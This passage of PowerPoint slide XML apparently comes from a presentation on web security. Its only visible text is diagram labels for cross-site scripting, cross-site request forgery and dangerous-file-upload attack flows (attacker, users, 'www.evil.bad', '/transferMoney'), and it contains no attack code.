        <p:spPr>
          <a:xfrm>
            <a:off x="3840120" y="2331000"/>
            <a:ext cx="15058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www.evil.bad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6" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230360" y="3651840"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="277" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1300680" y="3469680"/>
            <a:ext cx="1683720" cy="1498320"/>
            <a:chOff x="1300680" y="3469680"/>
            <a:chExt cx="1683720" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="278" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1410480" y="3469680"/>
              <a:ext cx="950400" cy="950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9" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1746000" y="3652920"/>
              <a:ext cx="950400" cy="95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0" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1300680" y="4604040"/>
              <a:ext cx="16837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Regular Users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81" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4181400" y="4604040"/>
            <a:ext cx="10483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Attacker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82" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="278" idx="0"/>
            <a:endCxn id="274" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1609200" y="3189600"/>
            <a:ext cx="556560" cy="3960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24983"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="283" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="274" idx="2"/>
            <a:endCxn id="272" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2563920" y="1247400"/>
            <a:ext cx="991800" cy="2341440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -17864"/>
              <a:gd name="adj2" fmla="val 49469"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="284" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="276" idx="1"/>
            <a:endCxn id="279" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2696040" y="4126680"/>
            <a:ext cx="1534320" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24994"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002040" y="4183560"/>
            <a:ext cx="104148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Phishing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E-mail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6" name="Graphic 27" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="3596040"/>
            <a:ext cx="529920" cy="529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7" name="Curved Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2745360" y="3224880"/>
            <a:ext cx="1603080" cy="853920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228480" y="1512360"/>
            <a:ext cx="1603440" cy="1948320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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1233000" y="523440"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Cross-Site Scripting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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="1228320"/>
            <a:ext cx="19486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www.trusted.good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1" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005800" y="4450680"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="292" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2200320" y="4268520"/>
            <a:ext cx="1683720" cy="1498680"/>
            <a:chOff x="2200320" y="4268520"/>
            <a:chExt cx="1683720" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="293" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2310120" y="4268520"/>
              <a:ext cx="950400" cy="950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94" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2645640" y="4452120"/>
              <a:ext cx="950400" cy="95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95" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2200320" y="5403240"/>
              <a:ext cx="16837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Regular Users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96" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956840" y="5403240"/>
            <a:ext cx="10483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Attacker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97" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="291" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="4210920" y="3180240"/>
            <a:ext cx="1601280" cy="939960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33415"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Graphic 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="50877" r="83807" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973320" y="2496960"/>
            <a:ext cx="567000" cy="707040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="299" name="Curved Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="293" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1591560" y="2486520"/>
            <a:ext cx="718920" cy="2257560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43787"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="TextBox 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742400" y="3515040"/>
            <a:ext cx="1048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Data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1" name="Picture 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1233000" y="1561320"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="TextBox 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="1224000"/>
            <a:ext cx="15058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www.evil.bad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Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069280" y="1383120"/>
            <a:ext cx="1603440" cy="1948320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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1176480" y="361440"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Cross-Site Request Forgery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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921680" y="1038960"/>
            <a:ext cx="19486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www.trusted.good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6" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386240" y="4321440"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="307" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1041120" y="4139280"/>
            <a:ext cx="1683720" cy="1498680"/>
            <a:chOff x="1041120" y="4139280"/>
            <a:chExt cx="1683720" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="308" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1150920" y="4139280"/>
              <a:ext cx="950400" cy="950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09" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1486440" y="4322880"/>
              <a:ext cx="950400" cy="95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0" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1041120" y="5274000"/>
              <a:ext cx="16837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Regular Users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11" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386240" y="5233680"/>
            <a:ext cx="10483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Attacker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12" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="306" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="3142080" y="2601720"/>
            <a:ext cx="1964880" cy="1474920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31867"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="Graphic 34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-3" t="-155" r="83693" b="49656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814840" y="1993680"/>
            <a:ext cx="570960" cy="727200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="314" name="Curved Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="309" idx="3"/>
            <a:endCxn id="306" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2436840" y="4796640"/>
            <a:ext cx="1949760" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25023"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="385623">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="TextBox 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149280" y="4430880"/>
            <a:ext cx="1048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$$$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6" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="69000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540400" y="1383120"/>
            <a:ext cx="1603440" cy="1948320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540400" y="1068120"/>
            <a:ext cx="1948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www.bank.com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18" name="Curved Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="313" idx="1"/>
            <a:endCxn id="309" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="1961640" y="2357280"/>
            <a:ext cx="853560" cy="1965960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="385623">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="319" name="Curved Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="316" idx="1"/>
            <a:endCxn id="303" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3672720" y="2357280"/>
            <a:ext cx="1868040" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="385623">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823560" y="1959840"/>
            <a:ext cx="1948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/transferMoney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be 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804400" y="1536120"/>
            <a:ext cx="1298160" cy="1922400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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850680" y="615240"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Upload of Dangerous File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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530440" y="1182240"/>
            <a:ext cx="1948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www.file.server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4" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094280" y="4316400"/>
            <a:ext cx="950400" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="325" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1473480" y="4134600"/>
            <a:ext cx="1683720" cy="1498320"/>
            <a:chOff x="1473480" y="4134600"/>
            <a:chExt cx="1683720" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="326" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1583280" y="4134600"/>
              <a:ext cx="950400" cy="950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27" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1918440" y="4317840"/>
              <a:ext cx="950400" cy="95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28" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1473480" y="5268960"/>
              <a:ext cx="16837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Regular Users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29" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045320" y="5250240"/>
            <a:ext cx="10483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Attacker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30" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="324" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218040" y="2898000"/>
            <a:ext cx="876600" cy="1893960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40427"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="331" name="Graphic 34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="67105" t="53204" r="16431" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218400" y="2521080"/>
            <a:ext cx="617400" cy="754560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206520" y="3516120"/>
            <a:ext cx="113544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Malicious Web Script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3" name="Graphic 22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001320" y="1847160"/>
            <a:ext cx="508680" cy="641880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="334" name="Curved Connector 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="326" idx="0"/>
            <a:endCxn id="333" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1546200" y="2679840"/>
            <a:ext cx="1967040" cy="943200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="afabab"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="TextBox 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333080" y="2136240"/>
            <a:ext cx="1510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Confidential Docs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36" name="Curved Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="321" idx="1"/>
            <a:endCxn id="324" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="10800000">
            <a:off x="2804040" y="2496960"/>
            <a:ext cx="1765440" cy="1819440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -9259"/>
              <a:gd name="adj2" fmla="val 54383"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="337" name="Graphic 45" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376160" y="2963880"/>
            <a:ext cx="230400" cy="290880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="338" name="Graphic 51" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608720" y="3684960"/>
            <a:ext cx="230400" cy="290880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="Graphic 52" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011680" y="3525120"/>
            <a:ext cx="230400" cy="290880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="Graphic 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
